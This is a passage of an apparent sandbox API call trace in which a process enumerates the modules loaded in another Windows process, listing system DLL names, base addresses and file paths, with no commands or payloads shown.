lpmodinfo=0x2600c88, cb=0x18 | out: lpmodinfo=0x2600c88*(lpBaseOfDll=0x7fef7bc0000, SizeOfImage=0x87e000, EntryPoint=0x0)) returned 1 [0046.956] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7bc0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="GrooveIntlResource.dll") returned 0x16 [0046.960] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7bc0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\PROGRA~1\\MICROS~1\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\micros~1\\office16\\1033\\grooveintlresource.dll")) returned 0x39 [0046.964] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7b80000, lpmodinfo=0x2602e98, cb=0x18 | out: lpmodinfo=0x2602e98*(lpBaseOfDll=0x7fef7b80000, SizeOfImage=0x35000, EntryPoint=0x7fef7b8c59c)) returned 1 [0046.968] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7b80000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="EhStorShell.dll") returned 0xf [0046.972] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7b80000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll")) returned 0x23 [0046.989] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7b00000, lpmodinfo=0x2605068, cb=0x18 | out: lpmodinfo=0x2605068*(lpBaseOfDll=0x7fef7b00000, SizeOfImage=0x7e000, EntryPoint=0x7fef7b01304)) returned 1 [0046.994] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7b00000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="cscui.dll") returned 0x9 [0046.998] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7b00000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll")) returned 0x1d [0047.002] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7af0000, lpmodinfo=0x2607228, cb=0x18 | out: lpmodinfo=0x2607228*(lpBaseOfDll=0x7fef7af0000, SizeOfImage=0xc000, EntryPoint=0x7fef7af1070)) returned 1 [0047.006] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7af0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CSCDLL.dll") returned 0xa [0047.010] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7af0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CSCDLL.dll" (normalized: "c:\\windows\\system32\\cscdll.dll")) returned 0x1e [0047.014] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0e0000, lpmodinfo=0x2609400, cb=0x18 | out: lpmodinfo=0x2609400*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0047.017] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CSCAPI.dll") returned 0xa [0047.021] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CSCAPI.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0047.025] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7a70000, lpmodinfo=0x260b5c0, cb=0x18 | out: lpmodinfo=0x260b5c0*(lpBaseOfDll=0x7fef7a70000, SizeOfImage=0x80000, EntryPoint=0x7fef7a74a8c)) returned 1 [0047.029] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7a70000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ntshrui.dll") returned 0xb [0047.033] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7a70000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")) returned 0x1f [0047.038] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd570000, lpmodinfo=0x260d780, cb=0x18 | out: lpmodinfo=0x260d780*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0047.042] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd570000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0047.046] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd570000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0047.050] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7a60000, lpmodinfo=0x260f940, cb=0x18 | out: lpmodinfo=0x260f940*(lpBaseOfDll=0x7fef7a60000, SizeOfImage=0x8000, EntryPoint=0x7fef7a61030)) returned 1 [0047.055] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7a60000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="IconCodecService.dll") returned 0x14 [0047.059] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7a60000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll")) returned 0x28 [0047.063] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x2611b30, cb=0x18 | out: lpmodinfo=0x2611b30*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0047.067] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0047.072] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0047.076] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x2613cf0, cb=0x18 | out: lpmodinfo=0x2613cf0*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0047.080] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0047.086] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0047.090] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2615eb0, cb=0x18 | out: lpmodinfo=0x2615eb0*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0047.095] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0047.100] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0047.104] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9a0000, lpmodinfo=0x2618080, cb=0x18 | out: lpmodinfo=0x2618080*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0047.109] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0047.113] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0047.118] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x261a240, cb=0x18 | out: lpmodinfo=0x261a240*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0047.122] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0047.126] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0047.131] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbd20000, lpmodinfo=0x261c410, cb=0x18 | out: lpmodinfo=0x261c410*(lpBaseOfDll=0x7fefbd20000, SizeOfImage=0x3b000, EntryPoint=0x7fefbd2f410)) returned 1 [0047.135] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbd20000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SndVolSSO.DLL") returned 0xd [0047.140] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbd20000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SndVolSSO.DLL" (normalized: "c:\\windows\\system32\\sndvolsso.dll")) returned 0x21 [0047.144] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbd10000, lpmodinfo=0x261e5e0, cb=0x18 | out: lpmodinfo=0x261e5e0*(lpBaseOfDll=0x7fefbd10000, SizeOfImage=0xb000, EntryPoint=0x7fefbd11020)) returned 1 [0047.148] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbd10000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="HID.DLL") returned 0x7 [0047.153] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbd10000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\HID.DLL" (normalized: "c:\\windows\\system32\\hid.dll")) returned 0x1b [0047.157] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbcc0000, lpmodinfo=0x2620790, cb=0x18 | out: lpmodinfo=0x2620790*(lpBaseOfDll=0x7fefbcc0000, SizeOfImage=0x4b000, EntryPoint=0x7fefbccefcc)) returned 1 [0047.162] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbcc0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="MMDevApi.dll") returned 0xc [0047.166] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbcc0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\MMDevApi.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")) returned 0x20 [0047.170] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef76f0000, lpmodinfo=0x2622960, cb=0x18 | out: lpmodinfo=0x2622960*(lpBaseOfDll=0x7fef76f0000, SizeOfImage=0x83000, EntryPoint=0x7fef771692c)) returned 1 [0047.175] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef76f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="timedate.cpl") returned 0xc [0047.180] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef76f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl")) returned 0x20 [0047.185] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb350000, lpmodinfo=0x2624b30, cb=0x18 | out: lpmodinfo=0x2624b30*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0047.190] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb350000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0047.195] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb350000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0047.200] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7600000, lpmodinfo=0x2626ce0, cb=0x18 | out: lpmodinfo=0x2626ce0*(lpBaseOfDll=0x7fef7600000, SizeOfImage=0xee000, EntryPoint=0x7fef76012a0)) returned 1 [0047.204] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7600000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="actxprxy.dll") returned 0xc [0047.210] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7600000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")) returned 0x20 [0047.214] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x2628eb0, cb=0x18 | out: lpmodinfo=0x2628eb0*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0047.219] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0047.223] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0047.228] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x262b070, cb=0x18 | out: lpmodinfo=0x262b070*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0047.233] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0047.238] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0047.242] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb200000, lpmodinfo=0x262d230, cb=0x18 | out: lpmodinfo=0x262d230*(lpBaseOfDll=0x7fefb200000, SizeOfImage=0x34000, EntryPoint=0x7fefb201890)) returned 1 [0047.247] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb200000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="shdocvw.dll") returned 0xb [0047.252] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb200000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll")) returned 0x1f [0047.257] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb1f0000, lpmodinfo=0x262f408, cb=0x18 | out: lpmodinfo=0x262f408*(lpBaseOfDll=0x7fefb1f0000, SizeOfImage=0xc000, EntryPoint=0x7fefb1f1380)) returned 1 [0047.262] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb1f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="LINKINFO.dll") returned 0xc [0047.266] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb1f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LINKINFO.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")) returned 0x20 [0047.271] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x26315d8, cb=0x18 | out: lpmodinfo=0x26315d8*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0047.277] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0047.282] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0047.288] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc280000, lpmodinfo=0x2633798, cb=0x18 | out: lpmodinfo=0x2633798*(lpBaseOfDll=0x7fefc280000, SizeOfImage=0x24000, EntryPoint=0x7fefc281024)) returned 1 [0047.295] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc280000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="shacct.dll") returned 0xa [0047.301] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc280000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")) returned 0x1e [0047.307] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc260000, lpmodinfo=0x2635958, cb=0x18 | out: lpmodinfo=0x2635958*(lpBaseOfDll=0x7fefc260000, SizeOfImage=0x1d000, EntryPoint=0x7fefc261ef4)) returned 1 [0047.312] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc260000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="SAMLIB.dll") returned 0xa [0047.316] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc260000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SAMLIB.dll" (normalized: "c:\\windows\\system32\\samlib.dll")) returned 0x1e [0047.323] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb980000, lpmodinfo=0x2637b18, cb=0x18 | out: lpmodinfo=0x2637b18*(lpBaseOfDll=0x7fefb980000, SizeOfImage=0x14000, EntryPoint=0x7fefb9816b4)) returned 1 [0047.328] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb980000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="samcli.dll") returned 0xa [0047.333] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb980000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")) returned 0x1e [0047.338] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb1b0000, lpmodinfo=0x2639cd8, cb=0x18 | out: lpmodinfo=0x2639cd8*(lpBaseOfDll=0x7fefb1b0000, SizeOfImage=0x3b000, EntryPoint=0x7fefb1b1070)) returned 1 [0047.343] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb1b0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="msls31.dll") returned 0xa [0047.348] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb1b0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")) returned 0x1e [0047.354] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef74b0000, lpmodinfo=0x263be98, cb=0x18 | out: lpmodinfo=0x263be98*(lpBaseOfDll=0x7fef74b0000, SizeOfImage=0x7f000, EntryPoint=0x7fef750385c)) returned 1 [0047.359] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef74b0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="tiptsf.dll") returned 0xa [0047.364] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef74b0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll")) returned 0x3d [0047.370] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc5c0000, lpmodinfo=0x263e098, cb=0x18 | out: lpmodinfo=0x263e098*(lpBaseOfDll=0x7fefc5c0000, SizeOfImage=0x1da000, EntryPoint=0x7fefc5c3130)) returned 1 [0047.375] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc5c0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="authui.dll") returned 0xa [0047.382] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc5c0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll")) returned 0x1e [0047.387] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc4b0000, lpmodinfo=0x2640258, cb=0x18 | out: lpmodinfo=0x2640258*(lpBaseOfDll=0x7fefc4b0000, SizeOfImage=0x10a000, EntryPoint=0x7fefc4b1010)) returned 1 [0047.392] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc4b0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="CRYPTUI.dll") returned 0xb [0047.399] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc4b0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTUI.dll" (normalized: "c:\\windows\\system32\\cryptui.dll")) returned 0x1f [0047.404] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7200000, lpmodinfo=0x2642430, cb=0x18 | out: lpmodinfo=0x2642430*(lpBaseOfDll=0x7fef7200000, SizeOfImage=0x2a3000, EntryPoint=0x7fef7203498)) returned 1 [0047.409] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7200000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="gameux.dll") returned 0xa [0047.415] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7200000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll")) returned 0x1e [0047.420] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbc60000, lpmodinfo=0x26445f0, cb=0x18 | out: lpmodinfo=0x26445f0*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0047.426] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbc60000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0047.431] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbc60000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0047.437] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef93a0000, lpmodinfo=0x26467b0, cb=0x18 | out: lpmodinfo=0x26467b0*(lpBaseOfDll=0x7fef93a0000, SizeOfImage=0x7c000, EntryPoint=0x7fef93a11d4)) returned 1 [0047.444] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef93a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wer.dll") returned 0x7 [0047.449] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef93a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")) returned 0x1b [0047.454] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb1a0000, lpmodinfo=0x2648960, cb=0x18 | out: lpmodinfo=0x2648960*(lpBaseOfDll=0x7fefb1a0000, SizeOfImage=0x9000, EntryPoint=0x7fefb1a35c0)) returned 1 [0047.460] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb1a0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="msiltcfg.dll") returned 0xc [0047.465] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb1a0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll")) returned 0x20 [0047.470] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef71d0000, lpmodinfo=0x264ab30, cb=0x18 | out: lpmodinfo=0x264ab30*(lpBaseOfDll=0x7fef71d0000, SizeOfImage=0x21000, EntryPoint=0x7fef71d73a0)) returned 1 [0047.477] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef71d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="UIAnimation.dll") returned 0xf [0047.482] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef71d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll")) returned 0x23 [0047.488] GetModuleInformation (in: hProcess=0x218, hModule=0x779f0000, lpmodinfo=0x264cd00, cb=0x18 | out: lpmodinfo=0x264cd00*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0047.494] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x779f0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="PSAPI.DLL") returned 0x9 [0047.499] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x779f0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PSAPI.DLL" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0047.506] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef7030000, lpmodinfo=0x264eec0, cb=0x18 | out: lpmodinfo=0x264eec0*(lpBaseOfDll=0x7fef7030000, SizeOfImage=0x19c000, EntryPoint=0x7fef7031030)) returned 1 [0047.511] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef7030000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="NetworkExplorer.dll") returned 0x13 [0047.517] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef7030000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NetworkExplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll")) returned 0x27 [0047.523] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9230000, lpmodinfo=0x26510a0, cb=0x18 | out: lpmodinfo=0x26510a0*(lpBaseOfDll=0x7fef9230000, SizeOfImage=0x3b000, EntryPoint=0x7fef92322f0)) returned 1 [0047.529] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9230000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="WINMM.dll") returned 0x9 [0047.535] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9230000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINMM.dll" (normalized: "c:\\windows\\system32\\winmm.dll")) returned 0x1d [0047.543] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6ff0000, lpmodinfo=0x2653260, cb=0x18 | out: lpmodinfo=0x2653260*(lpBaseOfDll=0x7fef6ff0000, SizeOfImage=0x3b000, EntryPoint=0x7fef7017600)) returned 1 [0047.549] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6ff0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="wdmaud.drv") returned 0xa [0047.555] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef6ff0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv")) returned 0x1e [0047.561] GetModuleInformation (in: hProcess=0x218, hModule=0x741d0000, lpmodinfo=0x2655420, cb=0x18 | out: lpmodinfo=0x2655420*(lpBaseOfDll=0x741d0000, SizeOfImage=0x6000, EntryPoint=0x741d1010)) returned 1 [0047.566] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x741d0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="ksuser.dll") returned 0xa [0047.573] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x741d0000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll")) returned 0x1e [0047.579] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb710000, lpmodinfo=0x26575e0, cb=0x18 | out: lpmodinfo=0x26575e0*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0047.586] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb710000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0047.592] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb710000, lpFilename=0x781780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0047.597] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef6fa0000, lpmodinfo=0x26597a0, cb=0x18 | out: lpmodinfo=0x26597a0*(lpBaseOfDll=0x7fef6fa0000, SizeOfImage=0x4f000, EntryPoint=0x7fef6fa2760)) returned 1 [0047.606] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef6fa0000, lpBaseName=0x781780, nSize=0x800 | out: lpBaseName="AUDIOSES.DLL") returned 0xc 